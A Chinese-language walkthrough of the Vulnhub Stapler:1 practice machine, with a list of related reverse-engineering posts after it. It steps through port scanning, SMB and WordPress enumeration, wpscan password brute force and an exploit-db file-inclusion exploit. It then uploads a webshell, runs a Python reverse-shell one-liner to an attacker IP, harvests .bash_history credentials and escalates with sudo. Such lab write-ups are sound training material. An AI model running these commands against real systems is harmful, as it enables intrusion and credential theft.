Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)

article/2025/9/19 0:29:48

Stapler:1(STAPLER: 1)靶机渗透-Vulnhub

  • 一、IP端口探测
  • 二、端口信息收集
    • 1.ftp匿名登录
    • 2.OpenSSH漏洞查询
    • 3.80端口
    • 4.666端口
    • 5.SMB枚举
    • 6.12380端口
  • 二、边界突破
    • 1.video插件文件包含
    • 2.修改wordpress数据库管理员密码
    • 3.上传webshell
  • 三、提权
  • 总结


该靶机(Stapler.ova)直接导入Vmware无法使用,可先导入VirtualBox,再通过VirtuaBox导出,将导出的文件使用Vmware运行即可。


一、IP端口探测

查看到开放21、22、53、80、139、666、3306、12380端口
在这里插入图片描述

二、端口信息收集

1.ftp匿名登录

ftp 172.16.9.21
anonymous

收集到3个像是用户名:Harry,Elly,John
在这里插入图片描述
除此外没有发现其他相关信息,改换端口

2.OpenSSH漏洞查询

在这里插入图片描述
7.2p版本存在用户名枚举漏洞,换其他端口

3.80端口

页面没什么东西,查看源码。目录扫描暂未发现信息,继续换端口
在这里插入图片描述

4.666端口

在这里插入图片描述
浏览器返回乱码,试试用nc将文件存下来

nc -nv 172.16.9.21 > stapler
file stapler
unzip stapler

在这里插入图片描述
查看图片未发现什么有价值的信息,继续收集其他端口
在这里插入图片描述

5.SMB枚举

enum4linux -a 172.16.9.21

针对SMB服务的信息收集一般先通过enum4linux枚举,再通过smbclient 连接查看
在这里插入图片描述
发现共享目录2个,并且枚举到用户名如下:
在这里插入图片描述
访问共享目录

smbclient //172.16.9.21/kathy

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
是个wordpress的备份文件,除此外暂时未发现其他可利用信息

6.12380端口

扫目录,查看页面源码都没获得什么信息
在这里插入图片描述
在这里插入图片描述
试试nikto扫一下,发现支持SSL,还发现/admin112233,/blogblog,/phpmyadmin这3个目录

nikto -h http://172.16.9.21:12380

在这里插入图片描述
使用https访问/admin112233,跳转到XSS一个站点
在这里插入图片描述
/blogblog是个wordpress站点
在这里插入图片描述
/phpmyadmin是个登录后台
在这里插入图片描述

使用wpscan爆破用户密码

wpscan --url https://172.16.9.21:12380/blogblog --enumerate u -P /usr/share/wordlists/rockyou.txt --disable-tls-checks

在这里插入图片描述
使用以上3个账户依次登录wordpress,发现均是低权限账户
在这里插入图片描述
搜索可知,wordpress的漏洞一般来源于使用的插件,扫一下都使用了哪些插件,这里要选择主动探测方式(–plugins-detection aggressive),默认被动探测无法扫出使用插件

wpscan --url https://172.16.9.21:12380/blogblog --enumerate ap --disable-tls-checks --plugins-detection aggressive

在这里插入图片描述
插件的检测方式不唯一,也可以通过dirb目录扫描,发现插件目录:

dirb https://172.16.9.21:12380/blogblog -r

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查询使用的插件是否存在相关漏洞,其中video插件存在文件包含漏洞
在这里插入图片描述

二、边界突破

1.video插件文件包含

searchsploit -m 39646

查看漏洞利用脚本,发现是通过访问URL,获取wp-config.php配置文件,并且标注了源码中漏洞代码位置(/inc/classes/class.avePost.php) Line 57:-——Line 78)在这里插入图片描述
改造脚本中POC,在浏览器访问:

https://172.16.9.21:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=…/wp-config.php

在这里插入图片描述
并没有出现预期的wp-config.php文件…
去exploit-db上查看下源码(/inc/classes/class.avePost.php) Line 57:-——Line 78)

https://www.exploit-db.com/exploits/39646

在这里插入图片描述
发现是把文件以.jepg的形式,存在了content目录下的uploads文件夹下
在这里插入图片描述

下载该.jpeg文件

wget https://172.16.9.21:12380/blogblog/wp-content/uploads/184734200.jpeg --no-check-certificate

在这里插入图片描述
在这里插入图片描述
查看文件,发现mysql用户名密码
在这里插入图片描述
注:文件包含漏洞其他利用思路:读取/etc/passwd文件,然后爆破系统用户密码

2.修改wordpress数据库管理员密码

使用上一步获得的mysql用户名密码(root / plbkac)登录数据库,当然也可以尝试ssh登录服务器,万一是服务器用户名密码呢~~但 很显然这个不是…继续…

查看wordpress数据库用户如下:
在这里插入图片描述
查阅资料知,默认情况下,wp_usermeta数据表中 wp_user_level=10 的为管理员权限,由此确定user_id=1的为管理员用户,即john
在这里插入图片描述
也可通过sql语句筛选管理员用户的id:

SELECT user_id FROM wp_usermeta WHERE meta_key = ‘wp_user_level’ AND meta_value = 10

可知id为1,3,15的均为管理员用户,即john,Peter,Vicki
在这里插入图片描述
修改管理员密码,此处以john为例,将密码修改为123123
在这里插入图片描述
使用john/123123登录
在这里插入图片描述

3.上传webshell

找到可以上传文件的地方,上传木马文件
kali中seclists目录下有针对wordpress的webshell

cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .

在这里插入图片描述

发现该webshell不是反弹shell类型,而是通过cmd参数命令执行,上传该webshell
在这里插入图片描述
在wp-conten/uploads目录下查看到上传的webshell
在这里插入图片描述
执行命令
在这里插入图片描述
反弹shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“172.16.9.9”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’

在这里插入图片描述

三、提权

优化终端

python -c ‘import pty;pty.spawn(“/bin/bash”)’

查看所有用户的历史命令

cat */.bash_history

在这里插入图片描述
ssh登录以上2个账户(JKanode/thisimypassword ; peter/JZQuyIN5),发现peter用户有sudo组权限,sudo直接提权

sudo -s

在这里插入图片描述


总结

路径:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权


http://chatgpt.dhexx.cn/article/XdVjGlmW.shtml

相关文章

Stapler#攻略

写在前面:前人栽树后人乘凉,谢谢网上各位大佬的解题思路作为参考学习; 一、实验准备 1、实验地址: Stapler: 1 ~ VulnHub 2、下载之后,本地解压,用VMware运行该虚拟机; ​ 3、设置stapler与攻击…

Stapler-1靶场详细教学(7种漏洞利用+5种提权)

目录 前言 简介 信息收集 0x00 主机发现 0x01 端口探测 0x02 信息收集-1 0x03 信息收集-2 0x04 漏洞利用-1 0x05 信息收集-3 0x06 漏洞利用-2 0x07 漏洞利用-3 0x08漏洞利用-4 0x09 漏洞利用-5 0x10 漏洞利用-6 0x11 漏洞利用-7 提权 0x12 提权-1-内核提权 0…

CSDN开通博客

今天想写博客,却发现没有开通博客页面没有发现验证码, 后来点击验证码输入框,验证码才出来。真是失策,我觉得还是在刷新页面的时候就显示验证码就好了。

【JavaScript 逆向】数美滑块逆向分析

声明 本文章中所有内容仅供学习交流,相关链接做了脱敏处理,若有侵权,请联系我立即删除! 案例目标 验证码:aHR0cHM6Ly93d3cuaXNodW1laS5jb20vbmV3L3Byb2R1Y3QvdHcvY29kZQ 以上均做了脱敏处理,Base64 编码及解…

个人总结 - JS逆向解析

目前加密的方式总结有下面几点: 对称加密(加密解密密钥相同):DES、DES3、AES 非对称加密(分公钥私钥):RSA 信息摘要算法/签名算法:MD5、HMAC、SHA 前端实际使用中MD5、AES、RSA&a…

【JavaScript 逆向】抖店滑块逆向分析

声明 本文章中所有内容仅供学习交流,相关链接做了脱敏处理,若有侵权,请联系我立即删除! 案例目标 接口: aHR0cHM6Ly93d3cuZG91eWluLmNvbS9hd2VtZS92MS93ZWIvdXNlci9wcm9maWxlL290aGVyLw 以上均做了脱敏处理&#…

MAC 逆向APK

准备逆向工具 apkTool 、apkTool.jar 、dex2Jar稳定版 (不要下载最新的2.0或者2.1 最新的dex2jar 运行会报错)、JUI 查看代码结构 (1) apkTool 、apkTool.jar:Apktool - How to Install 上面这段话是&#xff1…

java逆向_Java逆向入门(一)

Java是一门"半编译半解释"型语言.通过使用jdk提供的javac编译器可以将Java源码编译为Java虚拟机(Java Virtual Machine, JVM)可读的字节码(bytecode),即*.class文件. 学习字节码可以使你更好的理解Java虚拟机的行为,甚至对学习其它基于Java虚拟机的语言(如:Scala,Clo…

Android逆向基础——APK的格式

Android 安装包常以apk(android Package)、xapk为后缀,本质是一个压缩包,包内存存放运行着应用程序安装必要的所有资源、代码。可直接修改后缀为zip解包。 解包后目录大致如下: assets 资源文件,通过cont…

JS逆向笔记-记录某测试论坛的js逆向练习

这个网站应该是专门练习的,因为有个地方说不太通,在此只能算是练习,记录下,方便以后进行查阅。 首先访问主页: 他会设置一个cookie值,并且会把加密的salt 带出来。还有个叫lt的东西也会用html的形式传出来。…

Matlab逆向归纳法,逆向归纳法

逆向归纳法(backward induction)是求解动态博弈均衡的方法 [编辑] 什么是逆向归纳法 逆向归纳法(backward induction)是求解动态博弈均衡的方法。所谓动态博弈是指博弈参与人的行动存在着先后次序,并且后行动的参与人能够观察到前面的行动。逆向归纳法在逻辑上是严密…

逆向工程

逆向工程 数据库部分逆向工程说明导入文件 reverseProject添加相应jar包修改这个工程三个 .xml 文件都要修改的地方修改generatorConfig.xml文件 工程终点-运行GeneratorSqlMap.java文件 在使用mybatis时需要根据数据表创建实体类,pojo类的映射文件以及sql语句和Dao…

逆向 实战

逆向实操 汇编 《汇编语言》,王爽 《天书夜读》邵坚磊等 《Intel汇编指令集手册》 基础 学习汇编的原则 不推荐写纯汇编程序,一般都是通过_asm{}方式嵌入部分汇编代码学习汇编的目的是:解底层,调试,逆向分.c-编译->.s-汇编→.o(linux平台)/.obj(wi…

微信逆向分析(一)——逆向分析的原理

逆向的简单理解 正向开发,是先写代码,再编译成软件。而逆向分析,到手的只有软件。从软件入手,推测对应的代码,需要了解一下编译之后的软件是怎么跑起来的。 软件运行过程 1、软件加载到内存。 2、CPU读取内存的指令…

【JavaScript 逆向】网易易盾滑块逆向分析

声明 本文章中所有内容仅供学习交流,相关链接做了脱敏处理,若有侵权,请联系我立即删除! 案例目标 验证码:aHR0cHM6Ly9kdW4uMTYzLmNvbS90cmlhbC9qaWdzYXc 以上均做了脱敏处理,Base64 编码及解码方式&#xf…

【JavaScript 逆向】今日头条 jsvmp,_signature 参数分析

前言 现在一些网站对 JavaScript 代码采取了一定的保护措施,比如变量名混淆、执行逻辑混淆、反调试、核心逻辑加密等,有的还对数据接口进行了加密,这次案例是通过补环境过 jsvmp。 声明 本文章中所有内容仅供学习交流,相关链接…

【JavaScript 逆向】拼多多 anti_content 参数逆向解析

前言 现在一些网站对 JavaScript 代码采取了一定的保护措施,比如变量名混淆、执行逻辑混淆、反调试、核心逻辑加密等,有的还对数据接口进行了加密,这次案例是通过补环境过加密。 声明 本文章中所有内容仅供学习交流,相关链接做…

CTF逆向基础

更多资源请进入:https://github.com/SycloverTeam/SycRevLearn 查看。 1 IDA定位main函数 运行T1.exe。 将可执行程序放入IDA中,并查找字符。 双击。 按F5,进入代码。 可以对函数进行重新命名,此时也已经得到了flag。 2 …

[系统安全] 一.什么是逆向分析、逆向分析基础及经典扫雷游戏逆向

您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶…

逆向--基础知识篇

基础知识 可执行文件 计算机中可以被直接执行的程序被称之为可执行文件,可执行文件中是由指定操作系统的可执行文件格式规范与当前CPU机器指令码组成。不同的操作系统、不同的CPU之间的可执行文件都可能存在或多或少的差异。本篇主要以Windows操作系统、x86架构的…